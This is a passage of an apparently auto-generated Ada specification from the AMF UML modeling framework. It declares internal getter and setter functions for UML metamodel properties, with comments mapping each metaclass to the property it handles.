ActivityNode::inGroup -- ReadStructuralFeatureAction => ActivityNode::inGroup -- ReadVariableAction => ActivityNode::inGroup -- ReclassifyObjectAction => ActivityNode::inGroup -- ReduceAction => ActivityNode::inGroup -- RemoveStructuralFeatureValueAction => ActivityNode::inGroup -- RemoveVariableValueAction => ActivityNode::inGroup -- ReplyAction => ActivityNode::inGroup -- SendObjectAction => ActivityNode::inGroup -- SendSignalAction => ActivityNode::inGroup -- SequenceNode => ActivityNode::inGroup -- StartClassifierBehaviorAction => ActivityNode::inGroup -- StartObjectBehaviorAction => ActivityNode::inGroup -- StructuredActivityNode => ActivityNode::inGroup -- TestIdentityAction => ActivityNode::inGroup -- UnmarshallAction => ActivityNode::inGroup -- ValuePin => ActivityNode::inGroup -- ValueSpecificationAction => ActivityNode::inGroup function Internal_Get_In_Interruptible_Region (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ActivityNode::inInterruptibleRegion -- AcceptEventAction => ActivityNode::inInterruptibleRegion -- ActionInputPin => ActivityNode::inInterruptibleRegion -- ActivityFinalNode => ActivityNode::inInterruptibleRegion -- ActivityParameterNode => ActivityNode::inInterruptibleRegion -- AddStructuralFeatureValueAction => ActivityNode::inInterruptibleRegion -- AddVariableValueAction => ActivityNode::inInterruptibleRegion -- BroadcastSignalAction => ActivityNode::inInterruptibleRegion -- CallBehaviorAction => ActivityNode::inInterruptibleRegion -- CallOperationAction => ActivityNode::inInterruptibleRegion -- CentralBufferNode => ActivityNode::inInterruptibleRegion -- ClearAssociationAction => ActivityNode::inInterruptibleRegion -- ClearStructuralFeatureAction => ActivityNode::inInterruptibleRegion -- ClearVariableAction => ActivityNode::inInterruptibleRegion -- ConditionalNode => ActivityNode::inInterruptibleRegion -- CreateLinkAction => ActivityNode::inInterruptibleRegion -- CreateLinkObjectAction => ActivityNode::inInterruptibleRegion -- CreateObjectAction => ActivityNode::inInterruptibleRegion -- DataStoreNode => ActivityNode::inInterruptibleRegion -- DecisionNode => ActivityNode::inInterruptibleRegion -- DestroyLinkAction => ActivityNode::inInterruptibleRegion -- DestroyObjectAction => ActivityNode::inInterruptibleRegion -- ExpansionNode => ActivityNode::inInterruptibleRegion -- ExpansionRegion => ActivityNode::inInterruptibleRegion -- FlowFinalNode => ActivityNode::inInterruptibleRegion -- ForkNode => ActivityNode::inInterruptibleRegion -- InitialNode => ActivityNode::inInterruptibleRegion -- InputPin => ActivityNode::inInterruptibleRegion -- JoinNode => ActivityNode::inInterruptibleRegion -- LoopNode => ActivityNode::inInterruptibleRegion -- MergeNode => ActivityNode::inInterruptibleRegion -- OpaqueAction => ActivityNode::inInterruptibleRegion -- OutputPin => ActivityNode::inInterruptibleRegion -- RaiseExceptionAction => ActivityNode::inInterruptibleRegion -- ReadExtentAction => ActivityNode::inInterruptibleRegion -- ReadIsClassifiedObjectAction => ActivityNode::inInterruptibleRegion -- ReadLinkAction => ActivityNode::inInterruptibleRegion -- ReadLinkObjectEndAction => ActivityNode::inInterruptibleRegion -- ReadLinkObjectEndQualifierAction => ActivityNode::inInterruptibleRegion -- ReadSelfAction => ActivityNode::inInterruptibleRegion -- ReadStructuralFeatureAction => ActivityNode::inInterruptibleRegion -- ReadVariableAction => ActivityNode::inInterruptibleRegion -- ReclassifyObjectAction => ActivityNode::inInterruptibleRegion -- ReduceAction => ActivityNode::inInterruptibleRegion -- RemoveStructuralFeatureValueAction => ActivityNode::inInterruptibleRegion -- RemoveVariableValueAction => ActivityNode::inInterruptibleRegion -- ReplyAction => ActivityNode::inInterruptibleRegion -- SendObjectAction => ActivityNode::inInterruptibleRegion -- SendSignalAction => ActivityNode::inInterruptibleRegion -- SequenceNode => ActivityNode::inInterruptibleRegion -- StartClassifierBehaviorAction => ActivityNode::inInterruptibleRegion -- StartObjectBehaviorAction => ActivityNode::inInterruptibleRegion -- StructuredActivityNode => ActivityNode::inInterruptibleRegion -- TestIdentityAction => ActivityNode::inInterruptibleRegion -- UnmarshallAction => ActivityNode::inInterruptibleRegion -- ValuePin => ActivityNode::inInterruptibleRegion -- ValueSpecificationAction => ActivityNode::inInterruptibleRegion function Internal_Get_In_Partition (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ActivityNode::inPartition -- AcceptEventAction => ActivityNode::inPartition -- ActionInputPin => ActivityNode::inPartition -- ActivityFinalNode => ActivityNode::inPartition -- ActivityParameterNode => ActivityNode::inPartition -- AddStructuralFeatureValueAction => ActivityNode::inPartition -- AddVariableValueAction => ActivityNode::inPartition -- BroadcastSignalAction => ActivityNode::inPartition -- CallBehaviorAction => ActivityNode::inPartition -- CallOperationAction => ActivityNode::inPartition -- CentralBufferNode => ActivityNode::inPartition -- ClearAssociationAction => ActivityNode::inPartition -- ClearStructuralFeatureAction => ActivityNode::inPartition -- ClearVariableAction => ActivityNode::inPartition -- ConditionalNode => ActivityNode::inPartition -- ControlFlow => ActivityEdge::inPartition -- CreateLinkAction => ActivityNode::inPartition -- CreateLinkObjectAction => ActivityNode::inPartition -- CreateObjectAction => ActivityNode::inPartition -- DataStoreNode => ActivityNode::inPartition -- DecisionNode => ActivityNode::inPartition -- DestroyLinkAction => ActivityNode::inPartition -- DestroyObjectAction => ActivityNode::inPartition -- ExpansionNode => ActivityNode::inPartition -- ExpansionRegion => ActivityNode::inPartition -- FlowFinalNode => ActivityNode::inPartition -- ForkNode => ActivityNode::inPartition -- InitialNode => ActivityNode::inPartition -- InputPin => ActivityNode::inPartition -- JoinNode => ActivityNode::inPartition -- LoopNode => ActivityNode::inPartition -- MergeNode => ActivityNode::inPartition -- ObjectFlow => ActivityEdge::inPartition -- OpaqueAction => ActivityNode::inPartition -- OutputPin => ActivityNode::inPartition -- RaiseExceptionAction => ActivityNode::inPartition -- ReadExtentAction => ActivityNode::inPartition -- ReadIsClassifiedObjectAction => ActivityNode::inPartition -- ReadLinkAction => ActivityNode::inPartition -- ReadLinkObjectEndAction => ActivityNode::inPartition -- ReadLinkObjectEndQualifierAction => ActivityNode::inPartition -- ReadSelfAction => ActivityNode::inPartition -- ReadStructuralFeatureAction => ActivityNode::inPartition -- ReadVariableAction => ActivityNode::inPartition -- ReclassifyObjectAction => ActivityNode::inPartition -- ReduceAction => ActivityNode::inPartition -- RemoveStructuralFeatureValueAction => ActivityNode::inPartition -- RemoveVariableValueAction => ActivityNode::inPartition -- ReplyAction => ActivityNode::inPartition -- SendObjectAction => ActivityNode::inPartition -- SendSignalAction => ActivityNode::inPartition -- SequenceNode => ActivityNode::inPartition -- StartClassifierBehaviorAction => ActivityNode::inPartition -- StartObjectBehaviorAction => ActivityNode::inPartition -- StructuredActivityNode => ActivityNode::inPartition -- TestIdentityAction => ActivityNode::inPartition -- UnmarshallAction => ActivityNode::inPartition -- ValuePin => ActivityNode::inPartition -- ValueSpecificationAction => ActivityNode::inPartition function Internal_Get_In_State (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActionInputPin => ObjectNode::inState -- ActivityParameterNode => ObjectNode::inState -- CentralBufferNode => ObjectNode::inState -- DataStoreNode => ObjectNode::inState -- ExpansionNode => ObjectNode::inState -- InputPin => ObjectNode::inState -- OutputPin => ObjectNode::inState -- ValuePin => ObjectNode::inState function Internal_Get_In_Structured_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_In_Structured_Node (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AcceptCallAction => ActivityNode::inStructuredNode -- AcceptEventAction => ActivityNode::inStructuredNode -- ActionInputPin => ActivityNode::inStructuredNode -- ActivityFinalNode => ActivityNode::inStructuredNode -- ActivityParameterNode => ActivityNode::inStructuredNode -- AddStructuralFeatureValueAction => ActivityNode::inStructuredNode -- AddVariableValueAction => ActivityNode::inStructuredNode -- BroadcastSignalAction => ActivityNode::inStructuredNode -- CallBehaviorAction => ActivityNode::inStructuredNode -- CallOperationAction => ActivityNode::inStructuredNode -- CentralBufferNode => ActivityNode::inStructuredNode -- ClearAssociationAction => ActivityNode::inStructuredNode -- ClearStructuralFeatureAction => ActivityNode::inStructuredNode -- ClearVariableAction => ActivityNode::inStructuredNode -- ConditionalNode => ActivityNode::inStructuredNode -- ControlFlow => ActivityEdge::inStructuredNode -- CreateLinkAction => ActivityNode::inStructuredNode -- CreateLinkObjectAction => ActivityNode::inStructuredNode -- CreateObjectAction => ActivityNode::inStructuredNode -- DataStoreNode => ActivityNode::inStructuredNode -- DecisionNode => ActivityNode::inStructuredNode -- DestroyLinkAction => ActivityNode::inStructuredNode -- DestroyObjectAction => ActivityNode::inStructuredNode -- ExpansionNode => ActivityNode::inStructuredNode -- ExpansionRegion => ActivityNode::inStructuredNode -- FlowFinalNode => ActivityNode::inStructuredNode -- ForkNode => ActivityNode::inStructuredNode -- InitialNode => ActivityNode::inStructuredNode -- InputPin => ActivityNode::inStructuredNode -- JoinNode => ActivityNode::inStructuredNode -- LoopNode => ActivityNode::inStructuredNode -- MergeNode => ActivityNode::inStructuredNode -- ObjectFlow => ActivityEdge::inStructuredNode -- OpaqueAction => ActivityNode::inStructuredNode -- OutputPin => ActivityNode::inStructuredNode -- RaiseExceptionAction => ActivityNode::inStructuredNode -- ReadExtentAction => ActivityNode::inStructuredNode -- ReadIsClassifiedObjectAction => ActivityNode::inStructuredNode -- ReadLinkAction => ActivityNode::inStructuredNode -- ReadLinkObjectEndAction => ActivityNode::inStructuredNode -- ReadLinkObjectEndQualifierAction => ActivityNode::inStructuredNode -- ReadSelfAction => ActivityNode::inStructuredNode -- ReadStructuralFeatureAction => ActivityNode::inStructuredNode -- ReadVariableAction => ActivityNode::inStructuredNode -- ReclassifyObjectAction => ActivityNode::inStructuredNode -- ReduceAction => ActivityNode::inStructuredNode -- RemoveStructuralFeatureValueAction => ActivityNode::inStructuredNode -- RemoveVariableValueAction => ActivityNode::inStructuredNode -- ReplyAction => ActivityNode::inStructuredNode -- SendObjectAction => ActivityNode::inStructuredNode -- SendSignalAction => ActivityNode::inStructuredNode -- SequenceNode => ActivityNode::inStructuredNode -- StartClassifierBehaviorAction => ActivityNode::inStructuredNode -- StartObjectBehaviorAction => ActivityNode::inStructuredNode -- StructuredActivityNode => ActivityNode::inStructuredNode -- TestIdentityAction => ActivityNode::inStructuredNode -- UnmarshallAction => ActivityNode::inStructuredNode -- ValuePin => ActivityNode::inStructuredNode -- ValueSpecificationAction => ActivityNode::inStructuredNode function Internal_Get_Include (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UseCase => UseCase::include function Internal_Get_Including_Case (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Including_Case (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Include => Include::includingCase function Internal_Get_Incoming (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ActivityNode::incoming -- AcceptEventAction => ActivityNode::incoming -- ActionInputPin => ActivityNode::incoming -- ActivityFinalNode => ActivityNode::incoming -- ActivityParameterNode => ActivityNode::incoming -- AddStructuralFeatureValueAction => ActivityNode::incoming -- AddVariableValueAction => ActivityNode::incoming -- BroadcastSignalAction => ActivityNode::incoming -- CallBehaviorAction => ActivityNode::incoming -- CallOperationAction => ActivityNode::incoming -- CentralBufferNode => ActivityNode::incoming -- ClearAssociationAction => ActivityNode::incoming -- ClearStructuralFeatureAction => ActivityNode::incoming -- ClearVariableAction => ActivityNode::incoming -- ConditionalNode => ActivityNode::incoming -- ConnectionPointReference => Vertex::incoming -- CreateLinkAction => ActivityNode::incoming -- CreateLinkObjectAction => ActivityNode::incoming -- CreateObjectAction => ActivityNode::incoming -- DataStoreNode => ActivityNode::incoming -- DecisionNode => ActivityNode::incoming -- DestroyLinkAction => ActivityNode::incoming -- DestroyObjectAction => ActivityNode::incoming -- ExpansionNode => ActivityNode::incoming -- ExpansionRegion => ActivityNode::incoming -- FinalState => Vertex::incoming -- FlowFinalNode => ActivityNode::incoming -- ForkNode => ActivityNode::incoming -- InitialNode => ActivityNode::incoming -- InputPin => ActivityNode::incoming -- JoinNode => ActivityNode::incoming -- LoopNode => ActivityNode::incoming -- MergeNode => ActivityNode::incoming -- OpaqueAction => ActivityNode::incoming -- OutputPin => ActivityNode::incoming -- Pseudostate => Vertex::incoming -- RaiseExceptionAction => ActivityNode::incoming -- ReadExtentAction => ActivityNode::incoming -- ReadIsClassifiedObjectAction => ActivityNode::incoming -- ReadLinkAction => ActivityNode::incoming -- ReadLinkObjectEndAction => ActivityNode::incoming -- ReadLinkObjectEndQualifierAction => ActivityNode::incoming -- ReadSelfAction => ActivityNode::incoming -- ReadStructuralFeatureAction => ActivityNode::incoming -- ReadVariableAction => ActivityNode::incoming -- ReclassifyObjectAction => ActivityNode::incoming -- ReduceAction => ActivityNode::incoming -- RemoveStructuralFeatureValueAction => ActivityNode::incoming -- RemoveVariableValueAction => ActivityNode::incoming -- ReplyAction => ActivityNode::incoming -- SendObjectAction => ActivityNode::incoming -- SendSignalAction => ActivityNode::incoming -- SequenceNode => ActivityNode::incoming -- StartClassifierBehaviorAction => ActivityNode::incoming -- StartObjectBehaviorAction => ActivityNode::incoming -- State => Vertex::incoming -- StructuredActivityNode => ActivityNode::incoming -- TestIdentityAction => ActivityNode::incoming -- UnmarshallAction => ActivityNode::incoming -- ValuePin => ActivityNode::incoming -- ValueSpecificationAction => ActivityNode::incoming function Internal_Get_Information_Source (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationFlow => InformationFlow::informationSource function Internal_Get_Information_Target (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InformationFlow => InformationFlow::informationTarget function Internal_Get_Inherited_Member (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::inheritedMember -- Actor => Classifier::inheritedMember -- Artifact => Classifier::inheritedMember -- Association => Classifier::inheritedMember -- AssociationClass => Classifier::inheritedMember -- Class => Classifier::inheritedMember -- Collaboration => Classifier::inheritedMember -- CommunicationPath => Classifier::inheritedMember -- Component => Classifier::inheritedMember -- DataType => Classifier::inheritedMember -- DeploymentSpecification => Classifier::inheritedMember -- Device => Classifier::inheritedMember -- Enumeration => Classifier::inheritedMember -- ExecutionEnvironment => Classifier::inheritedMember -- Extension => Classifier::inheritedMember -- FunctionBehavior => Classifier::inheritedMember -- InformationItem => Classifier::inheritedMember -- Interaction => Classifier::inheritedMember -- Interface => Classifier::inheritedMember -- Node => Classifier::inheritedMember -- OpaqueBehavior => Classifier::inheritedMember -- PrimitiveType => Classifier::inheritedMember -- ProtocolStateMachine => Classifier::inheritedMember -- Signal => Classifier::inheritedMember -- StateMachine => Classifier::inheritedMember -- Stereotype => Classifier::inheritedMember -- UseCase => Classifier::inheritedMember function Internal_Get_Inherited_Parameter (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- RedefinableTemplateSignature => RedefinableTemplateSignature::inheritedParameter function Internal_Get_Inherited_State_Border (Self : AMF.Internals.AMF_Element) return AMF.UMLDI.Optional_UMLDI_UML_Inherited_State_Border_Kind; procedure Internal_Set_Inherited_State_Border (Self : AMF.Internals.AMF_Element; To : AMF.UMLDI.Optional_UMLDI_UML_Inherited_State_Border_Kind); -- UMLStateMachineDiagram => UMLStateMachineDiagram::inheritedStateBorder function Internal_Get_Input (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => Action::input -- AcceptEventAction => Action::input -- AddStructuralFeatureValueAction => Action::input -- AddVariableValueAction => Action::input -- BroadcastSignalAction => Action::input -- CallBehaviorAction => Action::input -- CallOperationAction => Action::input -- ClearAssociationAction => Action::input -- ClearStructuralFeatureAction => Action::input -- ClearVariableAction => Action::input -- ConditionalNode => Action::input -- CreateLinkAction => Action::input -- CreateLinkObjectAction => Action::input -- CreateObjectAction => Action::input -- DestroyLinkAction => Action::input -- DestroyObjectAction => Action::input -- ExpansionRegion => Action::input -- LoopNode => Action::input -- OpaqueAction => Action::input -- RaiseExceptionAction => Action::input -- ReadExtentAction => Action::input -- ReadIsClassifiedObjectAction => Action::input -- ReadLinkAction => Action::input -- ReadLinkObjectEndAction => Action::input -- ReadLinkObjectEndQualifierAction => Action::input -- ReadSelfAction => Action::input -- ReadStructuralFeatureAction => Action::input -- ReadVariableAction => Action::input -- ReclassifyObjectAction => Action::input -- ReduceAction => Action::input -- RemoveStructuralFeatureValueAction => Action::input -- RemoveVariableValueAction => Action::input -- ReplyAction => Action::input -- SendObjectAction => Action::input -- SendSignalAction => Action::input -- SequenceNode => Action::input -- StartClassifierBehaviorAction => Action::input -- StartObjectBehaviorAction => Action::input -- StructuredActivityNode => Action::input -- TestIdentityAction => Action::input -- UnmarshallAction => Action::input -- ValueSpecificationAction => Action::input function Internal_Get_Input_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ExpansionRegion => ExpansionRegion::inputElement function Internal_Get_Input_Value (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- CreateLinkAction => LinkAction::inputValue -- CreateLinkObjectAction => LinkAction::inputValue -- DestroyLinkAction => LinkAction::inputValue -- OpaqueAction => OpaqueAction::inputValue -- ReadLinkAction => LinkAction::inputValue function Internal_Get_Insert_At (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Insert_At (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- AddStructuralFeatureValueAction => AddStructuralFeatureValueAction::insertAt -- AddVariableValueAction => AddVariableValueAction::insertAt -- LinkEndCreationData => LinkEndCreationData::insertAt function Internal_Get_Instance (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Instance (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InstanceValue => InstanceValue::instance function Internal_Get_Interaction (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Interaction (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Lifeline => Lifeline::interaction -- Message => Message::interaction function Internal_Get_Interaction_Operator (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Interaction_Operator_Kind; procedure Internal_Set_Interaction_Operator (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Interaction_Operator_Kind); -- CombinedFragment => CombinedFragment::interactionOperator -- ConsiderIgnoreFragment => CombinedFragment::interactionOperator function Internal_Get_Interface (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Interface (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExtensionEnd => Property::interface -- Operation => Operation::interface -- Port => Property::interface -- Property => Property::interface function Internal_Get_Interface_Realization (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => BehavioredClassifier::interfaceRealization -- Actor => BehavioredClassifier::interfaceRealization -- AssociationClass => BehavioredClassifier::interfaceRealization -- Class => BehavioredClassifier::interfaceRealization -- Collaboration => BehavioredClassifier::interfaceRealization -- Component => BehavioredClassifier::interfaceRealization -- Device => BehavioredClassifier::interfaceRealization -- ExecutionEnvironment => BehavioredClassifier::interfaceRealization -- FunctionBehavior => BehavioredClassifier::interfaceRealization -- Interaction => BehavioredClassifier::interfaceRealization -- Node => BehavioredClassifier::interfaceRealization -- OpaqueBehavior => BehavioredClassifier::interfaceRealization -- ProtocolStateMachine => BehavioredClassifier::interfaceRealization -- StateMachine => BehavioredClassifier::interfaceRealization -- Stereotype => BehavioredClassifier::interfaceRealization -- UseCase => BehavioredClassifier::interfaceRealization function Internal_Get_Interrupting_Edge (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- InterruptibleActivityRegion => InterruptibleActivityRegion::interruptingEdge function Internal_Get_Interrupts (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Interrupts (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ControlFlow => ActivityEdge::interrupts -- ObjectFlow => ActivityEdge::interrupts function Internal_Get_Invariant (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Invariant (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- StateInvariant => StateInvariant::invariant function Internal_Get_Is_Abstract (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Abstract (Self : AMF.Internals.AMF_Element; To : Boolean); -- Activity => Class::isAbstract -- Actor => Classifier::isAbstract -- Artifact => Classifier::isAbstract -- Association => Classifier::isAbstract -- AssociationClass => Class::isAbstract -- Class => Class::isAbstract -- Collaboration => Classifier::isAbstract -- CommunicationPath => Classifier::isAbstract -- Component => Class::isAbstract -- DataType => Classifier::isAbstract -- DeploymentSpecification => Classifier::isAbstract -- Device => Class::isAbstract -- Enumeration => Classifier::isAbstract -- ExecutionEnvironment => Class::isAbstract -- Extension => Classifier::isAbstract -- FunctionBehavior => Class::isAbstract -- InformationItem => Classifier::isAbstract -- Interaction => Class::isAbstract -- Interface => Classifier::isAbstract -- Node => Class::isAbstract -- OpaqueBehavior => Class::isAbstract -- Operation => BehavioralFeature::isAbstract -- PrimitiveType => Classifier::isAbstract -- ProtocolStateMachine => Class::isAbstract -- Reception => BehavioralFeature::isAbstract -- Signal => Classifier::isAbstract -- StateMachine => Class::isAbstract -- Stereotype => Class::isAbstract -- UseCase => Classifier::isAbstract function Internal_Get_Is_Active (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Active (Self : AMF.Internals.AMF_Element; To : Boolean); -- Activity => Class::isActive -- AssociationClass => Class::isActive -- Class => Class::isActive -- Component => Class::isActive -- Device => Class::isActive -- ExecutionEnvironment => Class::isActive -- FunctionBehavior => Class::isActive -- Interaction => Class::isActive -- Node => Class::isActive -- OpaqueBehavior => Class::isActive -- ProtocolStateMachine => Class::isActive -- StateMachine => Class::isActive -- Stereotype => Class::isActive function Internal_Get_Is_Activity_Frame (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Activity_Frame (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLActivityDiagram => UMLActivityDiagram::isActivityFrame function Internal_Get_Is_Association_Dot_Shown (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Association_Dot_Shown (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLClassDiagram => UMLClassOrCompositeStructureDiagram::isAssociationDotShown -- UMLCompositeStructureDiagram => UMLClassOrCompositeStructureDiagram::isAssociationDotShown function Internal_Get_Is_Assured (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Assured (Self : AMF.Internals.AMF_Element; To : Boolean); -- ConditionalNode => ConditionalNode::isAssured function Internal_Get_Is_Behavior (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Behavior (Self : AMF.Internals.AMF_Element; To : Boolean); -- Port => Port::isBehavior function Internal_Get_Is_Collapse_State_Icon (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Collapse_State_Icon (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLStateMachineDiagram => UMLStateMachineDiagram::isCollapseStateIcon function Internal_Get_Is_Combine_Duplicate (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Combine_Duplicate (Self : AMF.Internals.AMF_Element; To : Boolean); -- JoinNode => JoinNode::isCombineDuplicate function Internal_Get_Is_Composite (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Composite (Self : AMF.Internals.AMF_Element; To : Boolean); -- ExtensionEnd => Property::isComposite -- FinalState => State::isComposite -- Port => Property::isComposite -- Property => Property::isComposite -- State => State::isComposite function Internal_Get_Is_Conjugated (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Conjugated (Self : AMF.Internals.AMF_Element; To : Boolean); -- Port => Port::isConjugated function Internal_Get_Is_Control (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Control (Self : AMF.Internals.AMF_Element; To : Boolean); -- ActionInputPin => Pin::isControl -- InputPin => Pin::isControl -- OutputPin => Pin::isControl -- ValuePin => Pin::isControl function Internal_Get_Is_Control_Type (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Control_Type (Self : AMF.Internals.AMF_Element; To : Boolean); -- ActionInputPin => ObjectNode::isControlType -- ActivityParameterNode => ObjectNode::isControlType -- CentralBufferNode => ObjectNode::isControlType -- DataStoreNode => ObjectNode::isControlType -- ExpansionNode => ObjectNode::isControlType -- InputPin => ObjectNode::isControlType -- OutputPin => ObjectNode::isControlType -- ValuePin => ObjectNode::isControlType function Internal_Get_Is_Covering (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Covering (Self : AMF.Internals.AMF_Element; To : Boolean); -- GeneralizationSet => GeneralizationSet::isCovering function Internal_Get_Is_Derived (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Derived (Self : AMF.Internals.AMF_Element; To : Boolean); -- Association => Association::isDerived -- AssociationClass => Association::isDerived -- CommunicationPath => Association::isDerived -- Extension => Association::isDerived -- ExtensionEnd => Property::isDerived -- Port => Property::isDerived -- Property => Property::isDerived function Internal_Get_Is_Derived_Union (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Derived_Union (Self : AMF.Internals.AMF_Element; To : Boolean); -- ExtensionEnd => Property::isDerivedUnion -- Port => Property::isDerivedUnion -- Property => Property::isDerivedUnion function Internal_Get_Is_Destroy_Duplicates (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Destroy_Duplicates (Self : AMF.Internals.AMF_Element; To : Boolean); -- LinkEndDestructionData => LinkEndDestructionData::isDestroyDuplicates function Internal_Get_Is_Destroy_Links (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Destroy_Links (Self : AMF.Internals.AMF_Element; To : Boolean); -- DestroyObjectAction => DestroyObjectAction::isDestroyLinks function Internal_Get_Is_Destroy_Owned_Objects (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Destroy_Owned_Objects (Self : AMF.Internals.AMF_Element; To : Boolean); -- DestroyObjectAction => DestroyObjectAction::isDestroyOwnedObjects function Internal_Get_Is_Determinate (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Determinate (Self : AMF.Internals.AMF_Element; To : Boolean); -- ConditionalNode => ConditionalNode::isDeterminate function Internal_Get_Is_Dimension (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Dimension (Self : AMF.Internals.AMF_Element; To : Boolean); -- ActivityPartition => ActivityPartition::isDimension function Internal_Get_Is_Direct (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Direct (Self : AMF.Internals.AMF_Element; To : Boolean); -- ReadIsClassifiedObjectAction => ReadIsClassifiedObjectAction::isDirect function Internal_Get_Is_Disjoint (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Disjoint (Self : AMF.Internals.AMF_Element; To : Boolean); -- GeneralizationSet => GeneralizationSet::isDisjoint function Internal_Get_Is_Double_Sided (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Double_Sided (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLClassifierShape => UMLClassifierShape::isDoubleSided function Internal_Get_Is_Exception (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Exception (Self : AMF.Internals.AMF_Element; To : Boolean); -- Parameter => Parameter::isException function Internal_Get_Is_External (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_External (Self : AMF.Internals.AMF_Element; To : Boolean); -- ActivityPartition => ActivityPartition::isExternal function Internal_Get_Is_Final_Specialization (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Final_Specialization (Self : AMF.Internals.AMF_Element; To : Boolean); -- Activity => Classifier::isFinalSpecialization -- Actor => Classifier::isFinalSpecialization -- Artifact => Classifier::isFinalSpecialization -- Association => Classifier::isFinalSpecialization -- AssociationClass => Classifier::isFinalSpecialization -- Class => Classifier::isFinalSpecialization -- Collaboration => Classifier::isFinalSpecialization -- CommunicationPath => Classifier::isFinalSpecialization -- Component => Classifier::isFinalSpecialization -- DataType => Classifier::isFinalSpecialization -- DeploymentSpecification => Classifier::isFinalSpecialization -- Device => Classifier::isFinalSpecialization -- Enumeration => Classifier::isFinalSpecialization -- ExecutionEnvironment => Classifier::isFinalSpecialization -- Extension => Classifier::isFinalSpecialization -- FunctionBehavior => Classifier::isFinalSpecialization -- InformationItem => Classifier::isFinalSpecialization -- Interaction => Classifier::isFinalSpecialization -- Interface => Classifier::isFinalSpecialization -- Node => Classifier::isFinalSpecialization -- OpaqueBehavior => Classifier::isFinalSpecialization -- PrimitiveType => Classifier::isFinalSpecialization -- ProtocolStateMachine => Classifier::isFinalSpecialization -- Signal => Classifier::isFinalSpecialization -- StateMachine => Classifier::isFinalSpecialization -- Stereotype => Classifier::isFinalSpecialization -- UseCase => Classifier::isFinalSpecialization function Internal_Get_Is_Frame (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_Is_Frame (Self : AMF.Internals.AMF_Element; To : Boolean); -- UMLActivityDiagram => UMLDiagram::isFrame -- UMLClassDiagram => UMLDiagram::isFrame -- UMLComponentDiagram => UMLDiagram::isFrame -- 